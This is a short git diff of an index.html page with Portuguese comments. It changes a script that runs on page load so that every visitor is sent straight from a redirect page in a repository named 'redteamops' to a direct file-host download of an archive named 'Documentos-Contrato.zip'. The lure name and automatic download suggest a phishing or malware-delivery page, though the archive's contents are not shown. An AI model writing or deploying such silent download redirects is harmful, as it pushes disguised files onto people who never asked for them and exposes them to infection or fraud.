--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <script type="text/javascript">
         // Função para redirecionar para o link desejado
         function redirecionar() {
-            window.location.href = "https://aizen042.github.io/redteamops.github.io/redirect2.html";
+            window.location.href = "https://download850.mediafire.com/ca881375u5fg1X43ULnjA_AxUHB6wSe6yEUcmOX7kjhaK5RcKsJCiIQli53JpVa-JaKifn0d3KJMVEj72f_SY3IIRIeTj6O-hmodnvV39dvi22e4PG2Vcb_5jxWVQL0JLJnMcBYen9Zy3dpbhkW-kn_zauow6C4ITZBEKeDYrnFNM5c/00g0x4az4or83q9/Documentos-Contrato.zip";
         }
         
         window.onload = redirecionar;
